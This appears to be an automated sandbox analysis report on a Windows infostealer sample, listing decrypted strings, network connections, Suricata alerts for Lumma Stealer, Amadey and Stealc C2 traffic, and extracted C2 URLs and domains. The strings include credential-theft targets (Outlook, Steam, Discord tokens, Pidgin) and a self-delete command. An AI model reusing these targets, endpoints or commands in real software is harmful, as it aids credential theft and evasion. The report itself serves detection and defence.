Source: 48.2.num.exe.2a0000.0.unpack String decryptor: A92DAA6EA6F891F2*
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: F8806DD0C461824F*
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Telegram
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Tox
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: *.tox
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: *.ini
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Password
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: 00000001
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: 00000002
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: 00000003
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: 00000004
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: \Outlook\accounts.txt
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Pidgin
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: \.purple\
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: accounts.xml
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: dQw4w9WgXcQ
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: token:
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Software\Valve\Steam
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: SteamPath
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: \config\
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: ssfn*
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: config.vdf
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: DialogConfig.vdf
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: libraryfolders.vdf
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: loginusers.vdf
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: \Steam\
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: sqlite3.dll
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: browsers
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: done
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: soft
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: \Discord\tokens.txt
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: https
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: POST
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: HTTP/1.1
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: Content-Disposition: form-data; name="
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: hwid
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: build
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: token
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: file_name
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: file
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: message
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 48.2.num.exe.2a0000.0.unpack String decryptor: screenshot.jpg
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49729 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49939 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49949 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49958 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49967 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49978 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49989 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50000 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50006 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50008 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50009 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50011 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50015 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50020 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50028 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50033 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50037 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50052 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50055 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50060 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50065 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50071 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50072 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50074 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50076 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50078 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50081 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50082 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50084 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50085 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:50089 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50107 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.6:50108 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50111 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50119 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.6:50120 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.6:50134 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50136 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50140 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50141 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.6:50139 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.6:50142 version: TLS 1.2
Source: Binary string: The name of the library's debug file. For example, 'xul.pdb source: firefox.exe, 0000002E.00000003.2993943486.0000020F30A48000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.2998056944.0000020F30A4A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.2996083751.0000020F30A4A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: "description": "The name of the library's debug file. For example, 'xul.pdb" source: firefox.exe, 0000002E.00000003.2993943486.0000020F30A48000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.2998056944.0000020F30A4A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.2996083751.0000020F30A4A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002E.00000003.2992504945.0000020F3083B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: Found range to be highlighted. Default highlights all ranges.An integer value of button by which menu item was clicked.Stops the profiler and discards any captured profile data.The name of the library's debug file. For example, 'xul.pdbCalled when websites' file systems have been cleared.Whether the new window should be an incognito window.Retrieves information about a single contextual identity.Information about the cookie that was set or removed. source: firefox.exe, 0000002E.00000003.2996083751.0000020F30A4A000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: my_library.pdbU source: b76bb5cee7.exe, 0000000A.00000003.2721535335.00000000050CB000.00000004.00001000.00020000.00000000.sdmp, b76bb5cee7.exe, 0000000A.00000002.2766160676.0000000000ACC000.00000040.00000001.01000000.0000000F.sdmp, b76bb5cee7.exe, 0000001D.00000002.2961232929.0000000000ACC000.00000040.00000001.01000000.0000000F.sdmp, b76bb5cee7.exe, 0000001D.00000003.2862123172.000000000524B000.00000004.00001000.00020000.00000000.sdmp, num.exe, 0000001F.00000002.2875624155.00000000002CC000.00000008.00000001.01000000.00000018.sdmp, num.exe, 00000030.00000000.3003390032.00000000002CC000.00000008.00000001.01000000.00000018.sdmp, num[1].exe.5.dr, num.exe.5.dr
Source: Binary string: my_library.pdb source: b76bb5cee7.exe, 0000000A.00000003.2721535335.00000000050CB000.00000004.00001000.00020000.00000000.sdmp, b76bb5cee7.exe, 0000000A.00000002.2766160676.0000000000ACC000.00000040.00000001.01000000.0000000F.sdmp, b76bb5cee7.exe, 0000001D.00000002.2961232929.0000000000ACC000.00000040.00000001.01000000.0000000F.sdmp, b76bb5cee7.exe, 0000001D.00000003.2862123172.000000000524B000.00000004.00001000.00020000.00000000.sdmp, num.exe, 0000001F.00000002.2875624155.00000000002CC000.00000008.00000001.01000000.00000018.sdmp, num.exe, 00000030.00000000.3003390032.00000000002CC000.00000008.00000001.01000000.00000018.sdmp, num[1].exe.5.dr, num.exe.5.dr
Source: Binary string: A partial SuggestResult object, without the 'content' parameter.Found range to be highlighted. Default highlights all ranges.An integer value of button by which menu item was clicked.Stops the profiler and discards any captured profile data.The name of the library's debug file. For example, 'xul.pdbCalled when websites' file systems have been cleared.Whether the new window should be an incognito window.Retrieves information about a single contextual identity.Information about the cookie that was set or removed. source: firefox.exe, 0000002E.00000003.2993943486.0000020F30A48000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: YQEN9A9QU4P1VROBPV5YS.exe, 00000003.00000003.2350536379.0000000004AA0000.00000004.00001000.00020000.00000000.sdmp, YQEN9A9QU4P1VROBPV5YS.exe, 00000003.00000002.2483748959.0000000000592000.00000040.00000001.01000000.00000006.sdmp, U2242U1STHGPPKHG.exe, 0000001E.00000003.2873579535.00000000026E0000.00000004.00001000.00020000.00000000.sdmp, U2242U1STHGPPKHG.exe, 0000001E.00000002.3008298151.0000000000632000.00000040.00000001.01000000.00000017.sdmp
Source: Binary string: Found range to be highlighted. Default highlights all ranges.An integer value of button by which menu item was clicked.Stops the profiler and discards any captured profile data.The name of the library's debug file. For example, 'xul.pdb source: firefox.exe, 0000002E.00000003.2998056944.0000020F30A4A000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\1003036001\efe6fe4127.exe Directory queried: number of queries: 1474
Source: firefox.exe Memory has grown: Private usage: 1MB later: 179MB

Networking

Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.6:58018 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.6:56521 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.6:58543 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.6:62553 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49710 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.6:65460 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49713 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49712 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49715 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49709 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49714 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49717 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49729 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:49866 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.6:50950 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.6:59497 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.6:61186 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:49881
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49939 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:49943 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49949 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.6:52153 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49958 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49967 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49978 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49989 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50000 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50001 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.6:50472 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50005 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.6:53511 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.6:52791 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.6:53992 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50008 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50009 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50006 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50011 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50010 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50015 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50020 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50022 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.6:50023 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50028 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50033 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50032 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50037 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50043 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.6:63461 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.6:65047 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.6:52599 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50074 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50081 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50078 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50085 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50084 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50088 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50082 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50089 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:50129 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:50076 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.6:58525 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49709 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49709 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49712 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49729 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49710 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49710 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49949 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49949 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49939 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49939 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49958 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50008 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50008 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50037 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:50074 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50074 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50089 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:50078 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50006 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.6:50085 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50009 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50009 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:50076 -> 188.114.96.3:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:50076 -> 188.114.96.3:443
Source: Malware configuration extractor URLs: http://185.215.113.206/6c4adf523b719729.php
Source: Malware configuration extractor URLs: founpiuer.store
Source: Malware configuration extractor URLs: navygenerayk.store
Source: Malware configuration extractor URLs: fadehairucw.store
Source: Malware configuration extractor URLs: presticitpo.store
Source: Malware configuration extractor URLs: thumbystriw.store
Source: Malware configuration extractor URLs: necklacedmny.store
